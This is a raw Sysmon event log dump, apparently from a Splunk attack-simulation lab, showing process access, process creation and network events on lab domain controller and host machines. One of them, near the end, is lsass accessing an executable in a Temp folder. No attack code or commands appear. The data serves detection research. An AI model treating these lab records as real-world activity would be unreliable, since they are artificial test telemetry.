Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296554Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:02.255{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1682-6216-FD06-000000003802}3116C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296553Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:02.255{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296552Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:02.255{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296551Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:02.255{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296550Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:02.255{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296549Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:02.255{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1682-6216-FD06-000000003802}3116C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296548Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:02.255{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1682-6216-FD06-000000003802}3116C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296547Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:02.257{C8EA50B7-1682-6216-FD06-000000003802}3116C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000296546Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:59.660{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49357-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296545Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:02.056{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=778B9D4BD5A6125AA21429A597485D1B,SHA256=FC5171171CB7EC3FAE05B9A37C744B3D9167AD2180EB7FFEE80DD5FEDA4F7C67,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296564Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:03.926{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1683-6216-FE06-000000003802}6620C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296563Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:03.926{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296562Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:03.926{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296561Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:03.926{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296560Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:03.926{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296559Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:03.926{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1683-6216-FE06-000000003802}6620C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296558Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:03.926{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1683-6216-FE06-000000003802}6620C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296557Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:03.927{C8EA50B7-1683-6216-FE06-000000003802}6620C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000296556Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:03.058{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B977E1144965DB1B3D44FCA6B7B90CC,SHA256=DB2DB1EAD93F004FC67080645F9F4A2720FCF72C363CF99C7383848D09D8D7BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296565Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:04.111{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8CF16BC154B3B0FF2AA49E8C77BCE6F,SHA256=80077787F0EDB44459052117355AA0C91CB639AD2F05D8BB853FC7E1A8CBD1A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220593Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:04.040{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B285C4DA6FB52D8CD05EF2925554B34,SHA256=8D59ABDD377D08708706F8CD78F555572BE24C5905F79A583526542414FB2207,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296568Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:03.420{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49358-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000296567Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:03.420{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49358-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000296566Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:05.127{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9314E6E679145B0C17C27B69F15504A9,SHA256=967834D602ACDA4140306A904E754265B3CAE1915FB0B7FF35271C59965298DF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220595Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:03.709{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51592-false10.0.1.12-8000- 23542300x8000000000000000220594Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:05.040{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90BAD450F2836168E397BCCC8DD4C83D,SHA256=A62BDCBB5A3F196A52E3F0D82E24378E1BD887492E798AEF1E0093A0F57E44D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296569Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:06.142{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52B0D7C80184247BBFBA3E329995B93D,SHA256=E5E787DD850CDD432B826C2D7913BD49F9BB1F620B07C7C5157B1D66DCE9F650,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220596Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:06.118{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B30226FA4ED6B63A919FE9480963BC8E,SHA256=714B2FC811973CC0BB5291E404F238B785C73F427A845817FA99D78D17FDD2D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296571Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:07.143{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FDDC1C5EF08189DE222FB7BC8AE0B8E,SHA256=0CED3776334ED09E346F1AB13FCB46D2A916550AE528B8E471DDCA981EFFB9AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220597Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:07.165{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C673126E81EF184EEBB172C18219D6F1,SHA256=0FB12A803A3234536465F6BCBF564A198C05533ED7476B9DDF3F4AAED0AEF408,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296570Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:04.669{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49359-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296572Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:08.178{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D47183C3B17DC5567A390DF4ED60C6E5,SHA256=EFC4BFA75A2496045DA7DF09629724A6BD9413831EB3137C1774663C0F32A83E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220598Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:08.211{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67CF94B76576ACDE03656FB1D15A65EB,SHA256=51BC551B78C2F6AE758FB7830DF8167C7808426C908A349842601B48B438D866,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296599Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:09.595{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-1689-6216-FF06-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296598Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 